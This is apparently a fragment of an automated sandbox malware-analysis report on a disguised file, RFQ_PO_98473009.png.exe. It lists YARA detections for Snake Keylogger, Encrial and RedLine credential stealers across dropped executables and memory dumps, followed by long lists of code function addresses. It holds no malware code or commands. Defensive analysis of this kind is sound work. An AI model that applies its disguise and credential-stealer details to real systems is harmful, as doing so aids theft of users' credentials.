                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c02f6.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.49c0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.Native_snake01.exe.21c1216.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3634743703.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3626656997.00000000025A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3634670005.0000000004A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000002.3638051660.0000000005100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_New-Nova.exe PID: 7852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_snake01.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_New-Nova.exe PID: 3000, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: Native_snake01.exe PID: 2524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: initial sample, Static PE information: Filename: RFQ_PO_98473009.png.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Process Stats: CPU usage > 49%
                      Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_01453E40
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_01456F90
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_0145DA7C
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079F8380
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FC798
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FC788
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FC348
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079F8371
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FE278
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FE268
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FEDD8
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FCBD0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe, Code function: 0_2_079FCBCE
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_02001437
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_02001448
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_02001198
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_020011A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BF89D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BFB6B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BF22E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BF89C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BFB630
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_04BFF218
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF54A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFA2E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF7E50
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF0619
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFF5D0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFF5C0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF79F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF49F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF79E8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF49E1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFD5E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF7590
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4588
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF75A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF7148
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFF178
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFF169
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFED10
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF7139
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4131
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFED20
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF3CD7
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE8C8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6CF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF3CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6CE1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF549C
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6898
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF3890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6889
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF3880
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE8B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6440
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE470
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE460
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE018
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFE008
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF0007
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF6430
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFDBC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFDBB0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFD768
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFFA18
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DF4E39
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05DFFA28
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E784D8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E76688
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E76020
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E77358
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E76CF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E74FD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73588
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73598
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E744D1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70489
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70498
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72428
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72438
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71720
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71730
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E7667C
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E711A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71190
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73140
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73131
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70006
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E76010
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E77349
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70D48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E70D38
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E76CE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72CE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72CD8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71FE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E74FC0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71FD1
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73E48
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E73E39
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E739E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E779E9
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E739F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E779F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E708E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E708F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72881
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E72890
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71B88
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_05E71B79
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_061898B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_06182A79
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_06182830
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, Code function: 10_2_061818B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, Code function: 12_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0041824412_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0040165012_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_00402F2012_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_004193C412_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0041878812_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_00402F8912_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_00402B9012_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_004073A012_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BD20A12_2_022BD20A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BD7B812_2_022BD7B8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BD4EA12_2_022BD4EA
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B74E012_2_022B74E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BC4E012_2_022BC4E0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BA59812_2_022BA598
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BDA9012_2_022BDA90
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B585712_2_022B5857
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BC98012_2_022BC980
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B6EA812_2_022B6EA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BEEE012_2_022BEEE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BCF3012_2_022BCF30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BCC5812_2_022BCC58
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B431112_2_022B4311
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BC6A812_2_022BC6A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B2EF812_2_022B2EF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022BEED012_2_022BEED0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_022B9F2012_2_022B9F20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C2AA812_2_061C2AA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C1FB812_2_061C1FB8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C947812_2_061C9478
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C186012_2_061C1860
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C516812_2_061C5168
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C9D6812_2_061C9D68
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CCDF012_2_061CCDF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CD23912_2_061CD239
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CD24812_2_061CD248
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C2A9E12_2_061C2A9E
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C969812_2_061C9698
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CD69012_2_061CD690
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CD6A012_2_061CD6A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CDAF812_2_061CDAF8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CDAE812_2_061CDAE8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CDF3F12_2_061CDF3F
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C0B3012_2_061C0B30
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C0B2012_2_061C0B20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CDF5012_2_061CDF50
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CE39A12_2_061CE39A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CE3A812_2_061CE3A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C1FA812_2_061C1FA8
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CE7F012_2_061CE7F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C000612_2_061C0006
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CE80012_2_061CE800
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CEC5812_2_061CEC58
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C185012_2_061C1850
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CEC4912_2_061CEC49
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C004012_2_061C0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CF0B012_2_061CF0B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CF0A012_2_061CF0A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C8CD012_2_061C8CD0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061CF4F712_2_061CF4F7
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_061C8CE012_2_061C8CE0
